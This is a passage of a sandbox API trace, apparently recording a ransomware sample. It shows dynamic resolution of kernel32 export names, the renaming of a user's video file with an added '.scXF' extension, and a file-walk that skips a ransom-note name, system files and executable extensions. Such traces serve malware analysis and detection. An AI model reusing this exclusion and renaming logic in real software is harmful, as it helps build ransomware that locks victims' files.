returned 22 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.399] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.399] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.399] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.399] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.399] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.399] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.399] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.399] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.399] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.399] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.399] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.399] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.399] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.399] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.399] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.399] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.399] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.399] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.400] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.400] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.400] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.400] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.400] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.400] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.400] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.400] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.400] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.400] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.400] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.400] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.400] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.400] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.400] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.400] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.400] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.400] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.400] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.401] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.401] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.401] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.401] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.401] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.401] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.401] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.401] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.401] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.401] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.401] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.401] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.401] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.401] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.401] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.401] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.401] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.401] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.401] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.402] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.402] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.402] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.402] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.402] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.402] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.402] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.402] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.402] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.402] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.402] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.402] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.402] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.402] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.402] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.402] lstrlenA (lpString="DELETEATOM") returned 10 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.402] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.402] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.402] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.403] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.403] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.403] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.403] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.403] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.403] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.403] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.403] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.403] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.403] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.403] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.403] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.403] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.403] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.403] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.403] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.403] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.403] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.403] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.404] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.404] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.404] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.404] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.404] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.404] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.404] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.404] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.404] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.404] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.404] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.404] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.404] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.404] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.404] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.404] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.404] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.404] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.404] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.405] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.405] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.405] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.405] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.405] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.405] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.405] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4") returned 51 [0083.405] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4.scXF") returned 56 [0083.405] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itt2-jrog.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ITt2-JROg.mp4.scXF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\itt2-jrog.mp4.scxf"), dwFlags=0x0) returned 1 [0083.406] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.406] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.406] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.406] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad8dcce0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xad8dcce0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad8dcce0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0083.406] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0083.406] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0083.406] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0083.406] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0083.406] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0083.407] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0083.407] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0083.407] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0083.407] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0083.407] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0083.407] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.407] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0083.407] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0083.407] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0083.407] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0083.407] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.407] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.407] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.407] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jkbimi8.tmp" [0083.407] VirtualAlloc (lpAddress=0x0, dwSize=0x28, 